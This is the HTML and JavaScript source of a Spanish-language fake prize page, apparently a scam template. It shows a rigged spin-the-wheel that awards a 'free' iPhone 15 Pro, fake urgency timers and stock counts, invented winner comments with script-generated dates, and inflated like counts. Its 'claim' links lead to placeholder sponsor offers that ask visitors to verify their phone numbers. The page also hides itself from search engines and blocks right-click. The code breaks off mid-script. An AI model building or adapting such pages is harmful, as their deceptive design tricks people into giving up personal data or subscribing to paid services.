<!DOCTYPE html>
<html lang="fr-ni">
    <head>
        <meta name="pushsdk" content="445235c9aa98603f6c583a9d143f677a" />
        <meta charset="utf-8" />
        <meta name="robots" content="noindex, nofollow, noarchive" />
        <meta name="referrer" content="no-referrer" />
        <meta content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" name="viewport" />
        <title>¡Felicidades!</title>
        <link rel="stylesheet" href="css/modal.css" />
        <script src="js/modal.js"></script>
        <script src="js/jquery.min.js"></script>
        <link id="favicon" rel="icon" href="favicon.ico" type="image/png" sizes="16x16" />
        <style>
            #ip_text {
                display: none;
            }
            #device_text {
                display: none;
            }
            #browser_text {
                display: none;
            }
            #loc_text {
                display: none;
            }
            #os_text {
                display: none;
            }
            #win_text {
                display: none;
            }
            #ip_check {
                display: none;
            }
            #device_check {
                display: none;
            }
            #browser_check {
                display: none;
            }
            #loc_check {
                display: none;
            }
            #os_check {
                display: none;
            }
        </style>
        <script>
            function getParameterByName(name) {
                name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
                var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"),
                    results = regex.exec(location.search);
                return results === null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
            }
            function dateOffset(f, c) {
                var b = new Boolean(null == f || 0 == f || void 0 == f || "" == f),
                    h = new Date(Date.now() - 24 * f * 60 * 60 * 1000);
                1 == b && (f = 0);
                var d = ["Domingo", "Lunes", "Martes", "Miércoles", "Jueves", "Viernes", "Sábado"], //["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],
                    g = ["enero", "febrero", "marzo", "abril", "mayo", "junio", "julio", "agosto", "septiembre", "octubre", "noviembre", "diciembre"]; //["January","February","March","April","May","June","July","August","September","October","November","December"];
                return null != !c && 0 != !c && void 0 != !c
                    ? h.getDate() + " de " + g[h.getMonth()]
                    : "day_name_only" == c && b
                    ? d[h.getDay()]
                    : "top_date" == c && b
                    ? d[h.getDay()] + ", " + h.getDate() + " " + g[h.getMonth()] + " " + h.getFullYear()
                    : void 0;
            }
        </script>
        <style>
            .icon,
            .menu {
                display: inline-block;
                margin-top: 13px;
            }
            #wheelCon,
            .icon,
            .menu,
            .logo {
                background-repeat: no-repeat;
                background-size: contain;
            }
            #firstpage,
            #wheelCon {
                background-color: #fff;
                border-radius: 3px;
            }
            #pressButton,
            #wheelCon,
            .icon,
            .menu,
            .logo {
                background-size: contain;
            }
            .spinAround,
            .spinAround2 {
                animation-timing-function: ease;
                animation-iteration-count: 1;
                animation-direction: normal;
            }
            #header,
            #subheadline,
            #topDate,
            .congrats {
                text-align: center;
            }
            #secondpage a,
            .button,
            .fm_item,
            .pi_links a,
            a.button {
                text-decoration: none;
            }
            .button,
            :focus {
                outline: 0;
            }
            ol,
            ul {
                list-style: decimal inside;
            }
            #header {
                background-color: #5d80a6;
                color: #fff;
                height: 43px;
                max-height: 43px;
                width: 100%;
                overflow: hidden;
            }
            #header h3 {
                display: inline-block;
                font-size: 1.1em;
                line-height: 40px;
                padding-left: 0;
            }
            .icon {
                background-image: url(images/61fa494df0b88.png);
                width: 20px;
                height: 18px;
                float: right;
                margin-right: 10px;
            }
            .menu {
                background-image: url(images/61fa494df0ba2.png);
                width: 18px;
                height: 16px;
                float: left;
                margin-left: 10px;
            }
            #devMockup,
            #secondpage {
                display: none;
            }
            #container {
                padding: 6px;
            }
            #firstpage {
                margin-bottom: 5px;
                padding: 5px 10px;
                position: relative;
            }
            #secondpage {
                position: relative;
            }
            #subheadline {
                font-weight: 400;
                line-height: 15px;
            }
            .name,
            .regular_price,
            .your_price {
                font-weight: 700;
            }
            .date {
                font-size: 0.85em;
                color: #9c9c9c;
                margin: 2px 0;
            }
            #topDate {
                width: 100%;
            }
            .intro {
                margin-bottom: 10px;
            }
            #wheelCon {
                position: relative;
                background-position: center;
                overflow: hidden;
            }
            #wheel {
                z-index: 1;
                width: 100%;
                height: auto;
                margin-top: 5px;
            }
            #pressButton {
                position: absolute;
                background-image: url(images/61fa494df0bb6.png);
                cursor: pointer;
                width: 25%;
                height: 0;
                padding-top: 30.5%;
                z-index: 2;
                margin-left: auto;
                margin-right: auto;
                left: 0;
                right: 0;
                top: 110px;
                border: none;
                background-color: transparent;
            }
            .congrats,
            .timer {
                line-height: 1.5;
                padding: 8px;
            }
            #pressButton:disabled {
                opacity: 1;
            }
            #devMockup {
                position: absolute;
                max-width: 200px;
                max-height: 270px;
                height: auto;
                z-index: 3;
            }
            @media (min-width: 614px) {
                #wheel {
                    width: 32vw;
                    left: 47vw;
                    top: 27vw;
                }
                #pressButton {
                    width: 6%;
                    top: 38% !important;
                    background-repeat: no-repeat;
                }
            }
            .spinAround {
                -webkit-animation: spin 6.6s;
                animation: spin 6.6s;
                -webkit-animation-fill-mode: forwards;
                -moz-animation-fill-mode: forwards;
                -o-animation-fill-mode: forwards;
                -ms-animation-fill-mode: forwards;
                animation-fill-mode: forwards;
            }
            @-webkit-keyframes spin {
                0% {
                    -webkit-transform: rotate(0);
                    -ms-transform: rotate(0);
                    transform: rotate(0);
                }
                90% {
                    -webkit-transform: rotate(3110deg);
                    -ms-transform: rotate(3110deg);
                    transform: rotate(3110deg);
                }
                95% {
                    -webkit-transform: rotate(3108deg);
                    -ms-transform: rotate(3108deg);
                    transform: rotate(3108deg);
                }
                100% {
                    -webkit-transform: rotate(3109deg);
                    -ms-transform: rotate(3109deg);
                    transform: rotate(3109deg);
                }
            }
            @keyframes spin {
                0% {
                    -webkit-transform: rotate(0);
                    -ms-transform: rotate(0);
                    transform: rotate(0);
                }
                90% {
                    -webkit-transform: rotate(3110deg);
                    -ms-transform: rotate(3110deg);
                    transform: rotate(3110deg);
                }
                95% {
                    -webkit-transform: rotate(3108deg);
                    -ms-transform: rotate(3108deg);
                    transform: rotate(3108deg);
                }
                100% {
                    -webkit-transform: rotate(3109deg);
                    -ms-transform: rotate(3109deg);
                    transform: rotate(3109deg);
                }
            }
            .spinAround2 {
                -webkit-animation: spin2 6.6s;
                animation: spin2 6.6s;
                -webkit-animation-fill-mode: forwards;
                -moz-animation-fill-mode: forwards;
                -o-animation-fill-mode: forwards;
                -ms-animation-fill-mode: forwards;
                animation-fill-mode: forwards;
            }
            @-webkit-keyframes spin2 {
                0% {
                    -webkit-transform: rotate(3109deg);
                    -ms-transform: rotate(3109deg);
                    transform: rotate(3109deg);
                }
                90% {
                    -webkit-transform: rotate(6314deg);
                    -ms-transform: rotate(6314deg);
                    transform: rotate(6314deg);
                }
                95% {
                    -webkit-transform: rotate(6312deg);
                    -ms-transform: rotate(6312deg);
                    transform: rotate(6312deg);
                }
                100% {
                    -webkit-transform: rotate(6313deg);
                    -ms-transform: rotate(6313deg);
                    transform: rotate(6313deg);
                }
            }
            @keyframes spin2 {
                0% {
                    -webkit-transform: rotate(3109deg);
                    -ms-transform: rotate(3109deg);
                    transform: rotate(3109deg);
                }
                90% {
                    -webkit-transform: rotate(6314deg);
                    -ms-transform: rotate(6314deg);
                    transform: rotate(6314deg);
                }
                95% {
                    -webkit-transform: rotate(6312deg);
                    -ms-transform: rotate(6312deg);
                    transform: rotate(6312deg);
                }
                100% {
                    -webkit-transform: rotate(6313deg);
                    -ms-transform: rotate(6313deg);
                    transform: rotate(6313deg);
                }
            }
            .animated {
                -webkit-animation-duration: 1s;
                animation-duration: 1s;
                -webkit-animation-fill-mode: both;
                animation-fill-mode: both;
            }
            @-webkit-keyframes rotateIn {
                0% {
                    -webkit-transform-origin: center;
                    transform-origin: center;
                    -webkit-transform: rotate3d(0, 0, 1, -200deg);
                    transform: rotate3d(0, 0, 1, -200deg);
                    opacity: 0;
                }
                100% {
                    -webkit-transform-origin: center;
                    transform-origin: center;
                    -webkit-transform: none;
                    transform: none;
                    opacity: 1;
                }
            }
            @keyframes rotateIn {
                0% {
                    -webkit-transform-origin: center;
                    transform-origin: center;
                    -webkit-transform: rotate3d(0, 0, 1, -200deg);
                    transform: rotate3d(0, 0, 1, -200deg);
                    opacity: 0;
                }
                100% {
                    -webkit-transform-origin: center;
                    transform-origin: center;
                    -webkit-transform: none;
                    transform: none;
                    opacity: 1;
                }
            }
            .rotateIn {
                -webkit-animation-name: rotateIn;
                animation-name: rotateIn;
            }
            * {
                margin: 0;
            }
            .button {
                -moz-box-shadow: inset 0 1px 0 0 #7a8eb9;
                -webkit-box-shadow: inset 0 1px 0 0 #7a8eb9;
                box-shadow: inset 0 1px 0 0 #7a8eb9;
                background: -webkit-gradient(linear, left top, left bottom, color-stop(0.05, #637aad), color-stop(1, #5972a7));
                background: -moz-linear-gradient(top, #637aad 5%, #5972a7 100%);
                background: -webkit-linear-gradient(top, #637aad 5%, #5972a7 100%);
                background: -o-linear-gradient(top, #637aad 5%, #5972a7 100%);
                background: -ms-linear-gradient(top, #637aad 5%, #5972a7 100%);
                background: linear-gradient(to bottom, #637aad 5%, #5972a7 100%);
                filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#637aad', endColorstr='#5972a7', GradientType=0);
            }
            .congrats,
            .prize,
            .timer {
                background-color: #fff;
                margin-bottom: 5px;
                border-radius: 3px;
            }
            .smallfont {
                font-size: 12px;
            }
            .name {
                color: #3c5a96;
                font-size: 100%;
            }
            .congrats h4 {
                font-size: 20px;
            }
            .timer {
                font-size: 12px;
            }
            ol {
                padding-left: 0;
                overflow-x: visible;
            }
            ol li {
                list-style-type: decimal;
            }
            @media screen and (max-width: 359px) {
                .button {
                    width: 150px !important;
                }
                .like-line-menu__item {
                    float: left;
                }
                .send-comments--submit {
                    width: 65px !important;
                }
            }
            .red_text {
                color: red;
            }
            .your_price span {
                color: green;
            }
            body {
                background: #fff !important;
                margin: 0;
                padding: 0;
                font-family: helvetica, arial, sans-serif;
                font-size: small;
            }
            .border_bottom {
                border-bottom: 1px solid #dfe3e8;
            }
            .like_people {
                height: 38px;
                display: table;
                padding: 0 0 1px;
                margin: 0 -2px 5px;
            }
            .like_people_images {
                display: table-cell;
                vertical-align: middle;
                white-space: nowrap;
            }
            .like_people_image_wrap:first-child {
                z-index: 1;
                margin: 0;
            }
            .like_people_image_wrap {
                width: 24px;
                height: 24px;
                border-radius: 100%;
                display: inline-block;
                vertical-align: top;
                margin: 0 0 0 -10px;
                position: relative;
                border: 2px solid #fff;
                overflow: hidden;
            }
            .like_people_image {
                width: 24px;
                height: 24px;
                border-radius: 100%;
                overflow: hidden;
            }
            .like_people_text {
                display: table-cell;
                vertical-align: middle;
                font-size: 13px;
                line-height: 14px;
                color: #909499;
                letter-spacing: -0.08px;
                padding: 0 0 0 6px;
            }
            .wi_buttons {
                padding: 0;
                position: relative;
                overflow: visible;
                height: 46px;
            }
            .item_like,
            .item_share,
            .item_views {
                color: #999;
                padding: 4px;
                margin-left: 1px;
                font-weight: 700;
            }
            .wi_buttons_wrap {
                display: table;
                min-width: 100%;
                padding: 2px 0 0 2px;
                box-sizing: border-box;
                margin: 0 0 0 -14px;
            }
            .wi_buttons .like_wrap {
                display: table;
            }
            .wi_buttons .item_like,
            .wi_buttons .item_share {
                float: none;
                margin: 0;
                background: 0 0;
            }
            .wi_buttons .item_like,
            .wi_buttons .item_share,
            .wi_buttons .item_views {
                display: table-cell;
                vertical-align: top;
                line-height: 20px;
                padding: 10px 12px 11px;
                text-align: left;
                min-width: 60px;
            }
            .item_date,
            .pi_acts_link .i_icon,
            .wi_buttons b {
                display: inline-block;
                vertical-align: top;
            }
            .wi_buttons i.i_like {
                background-position: 0 -60px !important;
            }
            .wi_buttons i.i_share {
                background-position: 0 -100px !important;
            }
            .wi_buttons i.i_views {
                background-position: 0 -160px !important;
            }
            .wi_buttons .item_views {
                width: 100%;
                text-align: right;
                padding: 10px 0;
                -webkit-user-select: none;
                -moz-user-select: none;
                -ms-user-select: none;
                user-select: none;
            }
            .wi_buttons i.i_like,
            .wi_buttons i.i_share,
            .wi_buttons i.i_views {
                background-image: url(images/61fa494df0bcb.png);
                display: inline-block;
                vertical-align: top;
                width: 20px;
                height: 20px;
                margin: 0;
                padding: 0;
                background-size: 100% !important;
                background-repeat: no-repeat;
            }
            .wi_buttons i.i_like,
            .wi_buttons i.i_share {
                float: left;
            }
            .wi_buttons b {
                color: #909499;
                font-size: 15px;
                font-weight: 400;
                line-height: 20px;
                letter-spacing: -0.2px;
                margin: 0 0 0 6px !important;
            }
            .photo_avatar img {
                border-radius: 50%;
                height: 40px;
                width: 40px;
            }
            .comment_name {
                font-size: 14px;
                color: #426997;
                font-weight: 600;
            }
            .comment_text {
                font-size: 14px;
                line-height: 19px;
                padding: 0;
                margin-top: 2px;
                letter-spacing: -0.22px;
            }
            .pi_links,
            .pi_links a,
            .show_next {
                line-height: 16px;
            }
            .item_date,
            .pi_links a {
                font-size: 13px;
                letter-spacing: -0.08px;
            }
            .item_date {
                color: #909499;
            }
            .pi_links {
                font-size: 13px;
                color: #909499;
                padding: 0;
                margin: 5px 0 0;
                overflow: hidden;
            }
            .pi_links a {
                padding: 0;
                margin: 0 3px;
                color: #4c6b8f;
                cursor: pointer;
            }
            .pi_acts_link {
                margin: 0 !important;
                float: right;
                -webkit-tap-highlight-color: transparent;
            }
            .pi_acts_link .i_icon {
                background-image: url(images/61fa494df0bdd.png);
                background-position: 0 0;
                margin: 2px 0 0;
                background-repeat: no-repeat;
                background-size: 100% !important;
                width: 12px;
                height: 12px;
                padding: 0;
            }
            .comments hr {
                margin: 0 !important;
            }
            .show_next_wrap {
                padding: 0 0 1px;
                border: 0;
                text-align: center;
            }
            .show_next {
                font-size: 14px !important;
                color: #426997;
                padding: 15px 0;
                font-weight: 400;
                border-radius: 0;
                border: 0;
                background: 0 0;
                display: block;
            }
            .create_post {
                background-color: #f1f1f1;
                border-top: 1px solid #eaeaea;
                border-bottom: 1px solid #e1e1e1;
                position: relative;
                margin-top: -1px;
                padding: 7px;
            }
            .comment_item .pi_cont {
                margin-left: 0;
                min-height: 34px;
            }
            .iwrap {
                margin: 0 6px 0 0;
            }
            .pi_cont .textfield {
                height: 3.6em;
            }
            .create_post .textfield {
                padding-top: 3px;
                padding-bottom: 3px;
                resize: vertical;
            }
            .textfield {
                vertical-align: top;
                width: 100%;
                min-width: 30px;
                border: 1px solid #b9c4d1;
                padding: 2px;
                margin: 0;
                -webkit-appearance: none;
                background: #fff;
                outline: 0;
                box-shadow: none;
                font-size: 14px;
                box-sizing: content-box;
                border-radius: 4px;
            }
            .mfoot {
                background-color: #f5f5f5;
            }
            .pfoot {
                padding: 10px 0;
            }
            .footer_menu {
                text-align: center;
                margin: 5px 0;
                line-height: 1.6em;
            }
            .fm_row {
                display: inline;
                white-space: nowrap;
            }
            .button,
            .clearfix {
                display: block;
            }
            .fm_item {
                padding: 4px 6px;
                font-size: 0.93em;
                color: #8a8a8a;
            }
            .container {
                padding: 0 12px 8px;
            }
            .button {
                width: 170px;
                padding: 0 8px;
                margin-top: 8px;
                text-align: center;
                background-color: #3b5998;
                background-image: -moz-linear-gradient(center top, #0c98c5, #0c98c5);
                border: 0 solid #4ec8ef;
                text-shadow: 0 0 rgba(0, 0, 0, 0.1);
                border-radius: 1px;
                cursor: default;
                color: #fff;
                font-size: 20px;
                font-weight: 700;
                height: 33px;
                line-height: 33px;
            }
            .comments {
                background: #fff;
                border-radius: 3px;
                margin: 0;
                padding: 0 0 30px;
            }
            .comments__item__meta {
                font-size: 9px;
                line-height: 14px;
                margin-top: 6px;
            }
            td {
                background-color: transparent;
                -webkit-transition: all 0.3s ease-in;
                -moz-transition: all 0.3s ease-in;
                -ms-transition: all 0.3s ease-in;
                -o-transition: all 0.3s ease-in;
                transition: all 0.3s ease-in;
            }
            hr {
                height: 0;
                font-size: 0;
                line-height: 0;
                border: none;
                background: 0 0;
                border-bottom: 1px #dadde1 solid;
                margin: 0 5px;
            }
            ul {
                padding-left: 0;
                overflow-x: visible;
            }
            .clearfix:after {
                content: " ";
                display: block;
                height: 0;
                clear: both;
                overflow: hidden;
                visibility: hidden;
            }
            @media screen and (min-width: 460px) {
                .comments__item__meta {
                    font-size: 8px;
                }
            }
            .fbimg {
                margin-top: 10px;
            }
            .fixed_footer {
                position: fixed;
                bottom: 0;
                height: 50px;
                border-top: 1px solid #e4e4e4;
                background-color: #fff;
                left: 0;
                right: 0;
                z-index: 10;
                box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            }
            .footer_input {
                color: #a0a4a3;
                border: none;
                margin-right: 0;
                font-size: 18px;
                position: absolute;
                left: 45px;
                top: 13px;
            }
            .btn_send,
            .clip {
                max-height: 30px;
                position: absolute;
                top: 10px;
            }
            .clip {
                left: 10px;
            }
            .btn_send {
                right: 10px;
            }
            @media screen and (max-device-width: 480px) {
                body {
                    -webkit-text-size-adjust: none;
                }
            }
            .logo {
                background-image: url(images/orangenew.png);
                width: 100px;
                height: 50px;
                position: absolute;
                left: 0;
                top: 0;
            }
            .span-second {
                padding-top: 15px;
                display: inline-block;
            }
        </style>
    </head>
    <body oncontextmenu="return!1" onload="setButtonHeight(),autospin1()">
        <div id="header">
            <span class="menu"></span>
            <h3><span id="headline">PROGRAMA DE FIDELIDAD</span></h3>
            <span class="icon"></span>
        </div>
        <div id="container">
            <div align="center" id="firstpage">
                <span class="logo"></span>
                <div class="date" id="topDate" style="padding-bottom: 10px; margin: 0;">
                    <script>
                        document.write(dateOffset(0, "top_date"));
                    </script>
                </div>
                <div style="margin-bottom: 2px;">
                    <div id="subheadline">
                        <p style="font-size: 18px;"><b>¡Felicidades!</b></p>
                        <p style="padding-top: 10px;">¡Hoy estás de suerte!</p>
                    </div>
                    <div class="intro" style="padding-top: 5px;">
                        Cada
                        <span id="today">
                            <script>
                                document.write(dateOffset(0, "day_name_only"));
                            </script>
                        </span>
                        seleccionamos a 7 usuarios para darles la oportunidad de ganar premios de nuestros patrocinadores. ¡Gira la ruleta para ver qué premio recibirás!
                    </div>
                    <div id="wheelCon">
                        <img class="transparent" height="501" id="wheel" src="images/fortuneiphone15new.png" width="501" /> <input id="pressButton" onclick="spin()" style="top: 106.2px;" type="button" />
                        <div><img class="animated rotateIn" id="devMockup" src="images/iphone15pro-preview.png" style="display: hidden; left: 64px; top: 42px;" /></div>
                    </div>
                </div>

                <div id="secondpage">
                    <span class="logo"></span>
                    <div class="congrats">
                        <h4>
                            <a href="{offer_link}" style="cursor: pointer !important;" preventexitpop="false" rel="noreferrer">
                                <font color="#3C5A96">
                                    ¡Felicidades!<br />
                                    <span class="span-second"> ¡Nuevo iPhone 15 Pro!</span>
                                </font>
                            </a>
                        </h4>
                    </div>
                    <div class="congrats" style="text-align: left;">
                        <ol>
                            <li>Elige el color que más te guste. Se te redirigirá al sitio web de nuestro patrocinador.</li>
                            <li>Verifique su número de teléfono móvil en el sitio web del patrocinador para descargar su vale personal y reclamar su premio.</li>
                        </ol>
                        <b>IMPORTANTE:</b> Los regalos pueden terminar en cualquier momento, ¡elige más rápido!
                    </div>
                    <div class="timer">
                        Oferta válida durante
                        <font color="red">
                            <b><span id="mins">4</span> minutos y <span id="hsecs">59</span> segundos</b>
                        </font>
                    </div>
                    <div class="prize">
                        <table>
                            <tbody>
                                <tr>
                                    <th></th>
                                    <td style="padding: 10px 5px 10px 0; text-align: center;"><img src="images/iphone15pro-white.jpg" style="max-width: 100px;" /></td>
                                    <td style="line-height: 1.6;">
                                        <p style="text-align: left;">
                                            <a href="{offer_link}" style="cursor: pointer !important;" preventexitpop="false" rel="noreferrer"><span class="name">iPhone 15 Pro 256GB (White Titanium)</span></a>
                                        </p>
                                        <p><span class="smallfont">Pantalla Super Retina XDR² de 6,1 pulgadas con Always-On y ProMotion</span></p>
                                        <p class="regular_price">Precio de venta al público: <s class="red_text">1269 €</s></p>
                                        <p class="your_price">Tu precio: <span>0 €</span></p>
                                        <p class="remaining">
                                            <b>Izquierda: <span>2</span></b>
                                        </p>
                                        <div>
                                            <a class="button" href="{offer_link}" style="cursor: pointer !important;" preventexitpop="false" rel="noreferrer"> Elija </a>
                                        </div>
                                    </td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                    <div class="prize">
                        <table>
                            <tbody>
                                <tr>
                                    <th></th>
                                    <td style="padding: 10px 5px 10px 0; text-align: center;"><img src="images/iphone15pro-gold.jpg" style="max-width: 100px;" /></td>
                                    <td style="line-height: 1.6;">
                                        <p style="text-align: left;">
                                            <a href="{offer_link}" style="cursor: pointer !important;" preventexitpop="false" rel="noreferrer"><span class="name">iPhone 15 Pro 256GB (Black Titanium)</span></a>
                                        </p>
                                        <p><span class="smallfont">Pantalla Super Retina XDR² de 6,1 pulgadas con Always-On y ProMotion</span></p>
                                        <p class="regular_price">Precio de venta al público: <s class="red_text">1269 €</s></p>
                                        <p class="your_price">Tu precio: <span>0 €</span></p>
                                        <p class="remaining">
                                            <b>Izquierda: <span>1</span></b>
                                        </p>
                                        <div>
                                            <a class="button" href="{offer_link}" style="cursor: pointer !important;" preventexitpop="false" rel="noreferrer"> Elija </a>
                                        </div>
                                    </td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                </div>
            </div>
            <div class="container">
                <div class="comments">
                    <div class="wi_like_wrap border_bottom">
                        <span class="like_people">
                            <span class="like_people_images">
                                <span class="like_people_image_wrap"><img class="like_people_image" height="24" src="images/61fa494df08b7.jpg" width="24" /></span>
                                <span class="like_people_image_wrap"><img class="like_people_image" height="24" src="images/61fa494df08dd.jpg" width="24" /></span>
                            </span>
                            <span class="like_people_text">A 2319 personas les gusta esto</span>
                        </span>
                    </div>
                    <div class="wi_buttons border_bottom">
                        <div class="wi_buttons_wrap">
                            <span class="like_wrap">
                                <span class="item_like _i"><i class="i_like"></i> <b class="v_like">1537</b></span> <span class="item_share is_empty _i"><i class="i_share"></i> <b class="v_share">234</b></span>
                            </span>
                            <span class="item_views"><i class="i_views"></i> <b class="v_views">544K</b></span>
                        </div>
                    </div>
                    <center>
                        <font face="arial"></font>
                        <table border="0" cellpadding="4" cellspacing="0" style="padding-top: 10px; font-size: 13px;" width="100%">
                            <tbody id="comments_list">
                                <tr>
                                    <td align="right" class="photo_avatar" valign="top" width="40"><img src="images/comment-1.jpeg" /></td>
                                    <td align="left" valign="top">
                                        <div class="comment_name">Maykel Hernández</div>
                                        <div class="comment_text">¡Se me cayó el iPhone 15 Pro! Sinceramente, quería el Steam Deck, pero hoy no ...</div>
                                        <div class="comments__item__meta">
                                            <div class="item_date">Ayer a las 08:13</div>
                                        </div>
                                        <div class="pi_links">
                                            <span class="like_wrap"><span class="pi_link">Me gusta</span></span> <span class="pi_reply_wrap">· <span>Comentario</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">
                                        <hr />
                                    </td>
                                </tr>
                                <tr>
                                    <td align="right" class="photo_avatar" valign="top" width="40"><img src="images/comment-2.jpeg" /></td>
                                    <td align="left" valign="top">
                                        <div class="comment_name">José Martínez</div>
                                        <div class="comment_text">He ganado 1 tirada gratuita, pero no he ganado ningún premio. ¿Puedo tener otra oportunidad?</div>
                                        <div class="comments__item__meta">
                                            <div class="item_date">
                                                <script>
                                                    document.write(dateOffset(2));
                                                </script>
                                                16 de diciembre
                                            </div>
                                        </div>
                                        <div class="pi_links">
                                            <span class="like_wrap"><span class="pi_link">Me gusta</span></span> <span class="pi_reply_wrap">· <span>Comentario</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">
                                        <hr />
                                    </td>
                                </tr>
                                <tr>
                                    <td align="right" class="photo_avatar" valign="top" width="40"><img src="images/comment-3.jpeg" /></td>
                                    <td align="left" valign="top">
                                        <div class="comment_name">Josine García</div>
                                        <div class="comment_text">¡Acabo de desempaquetar la nueva Baraja Steam! ¡Es el mejor premio de todos!</div>
                                        <div class="comments__item__meta">
                                            <div class="item_date">
                                                <script>
                                                    document.write(dateOffset(2));
                                                </script>
                                                16 de diciembre
                                            </div>
                                        </div>
                                        <div class="pi_links">
                                            <span class="like_wrap"><span class="pi_link">Me gusta</span></span> <span class="pi_reply_wrap">· <span>Comentario</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">
                                        <hr />
                                    </td>
                                </tr>
                                <tr>
                                    <td align="right" class="photo_avatar" valign="top" width="40"><img src="images/comment-4.jpg" /></td>
                                    <td align="left" valign="top">
                                        <div class="comment_name">Eslie Mendoza</div>
                                        <div class="comment_text">Al principio pensé que era una broma, pero esta mañana me han entregado un nuevo iPhone 15 Pro, ¡y también una camiseta con el logotipo!</div>
                                        <div class="comments__item__meta">
                                            <div class="item_date">
                                                <script>
                                                    document.write(dateOffset(2));
                                                </script>
                                                16 de diciembre
                                            </div>
                                        </div>
                                        <div class="pi_links">
                                            <span class="like_wrap"><span class="pi_link">Me gusta</span></span> <span class="pi_reply_wrap">· <span>Comentario</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">
                                        <hr />
                                    </td>
                                </tr>
                                <tr>
                                    <td align="right" class="photo_avatar" valign="top" width="40"><img src="images/comment-5.jpeg" /></td>
                                    <td align="left" valign="top">
                                        <div class="comment_name">Geovanny Rivera</div>
                                        <div class="comment_text">¡Mi Samsung Galaxy S23 llegó esta mañana! ¡¡¡Me encanta!!!</div>
                                        <div class="comments__item__meta">
                                            <div class="item_date">
                                                <script>
                                                    document.write(dateOffset(3));
                                                </script>
                                                15 de diciembre
                                            </div>
                                        </div>
                                        <div class="pi_links">
                                            <span class="like_wrap"><span class="pi_link">Me gusta</span></span> <span class="pi_reply_wrap">· <span>Comentario</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">
                                        <hr />
                                    </td>
                                </tr>
                                <tr>
                                    <td align="right" class="photo_avatar" valign="top" width="40"><img src="images/comment-6.jpg" /></td>
                                    <td align="left" valign="top">
                                        <div class="comment_name">Derian Ramírez</div>
                                        <div class="comment_text">He ganado los AirPods Pro. ¡Todavía no me creo que sea verdad!</div>
                                        <div class="comments__item__meta">
                                            <div class="item_date">
                                                <script>
                                                    document.write(dateOffset(3));
                                                </script>
                                                15 de diciembre
                                            </div>
                                        </div>
                                        <div class="pi_links">
                                            <span class="like_wrap"><span class="pi_link">Me gusta</span></span> <span class="pi_reply_wrap">· <span>Comentario</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">
                                        <hr />
                                    </td>
                                </tr>
                                <tr>
                                    <td align="right" class="photo_avatar" valign="top" width="40"><img src="images/comment-7.jpg" /></td>
                                    <td align="left" valign="top">
                                        <div class="comment_name">Bretaña Flores</div>
                                        <div class="comment_text">He ganado el iPhone 15, pero ya lo tengo, ¿puedo cambiar el premio en la Cubierta de Steam?</div>
                                        <div class="comments__item__meta">
                                            <div class="item_date">
                                                <script>
                                                    document.write(dateOffset(4));
                                                </script>
                                            </div>
                                        </div>
                                        <div class="pi_links">
                                            <span class="like_wrap"><span class="pi_link">Me gusta</span></span> <span class="pi_reply_wrap">· <span>Comentario</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">
                                        <hr />
                                    </td>
                                </tr>
                            </tbody>
                        </table>
                        <div class="show_next_wrap">
                            <span class="show_next">Ver todos</span>
                        </div>
                    </center>
                </div>
            </div>
            <div class="fixed_footer"><img alt="" class="clip" src="images/61fa494df099d.png" /> <input class="footer_input" placeholder="Su mensaje" type="text" /> <img alt="" class="btn_send" src="images/61fa494df09b3.png" /></div>
        </div>
        <input type="hidden" name="ip" /><input type="hidden" name="country" /><input type="hidden" name="city" />

        <script type="text/javascript">
            var divIntro = $("div .intro");
            divIntro.html(divIntro.html().replace("Unknown", "Safari"));
            let date = new Date("Feb 10 2022 00:00:00");
            function counts() {
                if (document.getElementById("timer__till")) {
                    let now = new Date();
                    let gap = date - now;
                    let days = Math.floor(gap / 1000 / 60 / 60 / 24);
                    let hours = Math.floor(gap / 1000 / 60 / 60) % 24;
                    let minutes = Math.floor(gap / 1000 / 60) % 60;
                    let seconds = Math.floor(gap / 1000) % 60;
                    if (gap > 0) {
                        document.getElementById("days").innerText = days;
                        document.getElementById("hours").innerText = hours;
                        document.getElementById("minutes").innerText = minutes;
                        document.getElementById("seconds").innerText = seconds;
                        if (days < 10) {
                            document.getElementById("days").innerText = "0" + days;
                        }
                        if (hours < 10) {
                            document.getElementById("hours").innerText = "0" + hours;
                        }
                        if (minutes < 10) {
                            document.getElementById("minutes").innerText = "0" + minutes;
                        }
                        if (seconds < 10) {
                            document.getElementById("seconds").innerText = "0" + seconds;
                        }
                    } else {
                        document.querySelector(".timer__wrapper").innerText = "Акция завершилась";
                    }
                } else {
                    clearInterval(intervalId);
                }
            }
            let intervalId = setInterval(() => {
                counts();
            }, 1000);
            var page = "page",
                brand = "device_brand";
            var conMid,
                mydate = new Date(),
                year = mydate.getFullYear(),
                month = mydate.getMonth(),
                day = mydate.getDate(),
                weekday = mydate.getDay(),
                count = 1,
                headline = document.getElementById("headline"),
                topDate = document.getElementById("topDate"),
                today = document.getElementById("today"),
                con = document.getElementById("container"),
                whCon = document.getElementById("wheelCon"),
                dWheel = document.getElementById("wheel"),
                button = document.getElementById("pressButton"),
                device = document.getElementById("devMockup"),
                first = document.getElementById("firstpage"),
                second = document.getElementById("secondpage");

            function setButtonHeight() {
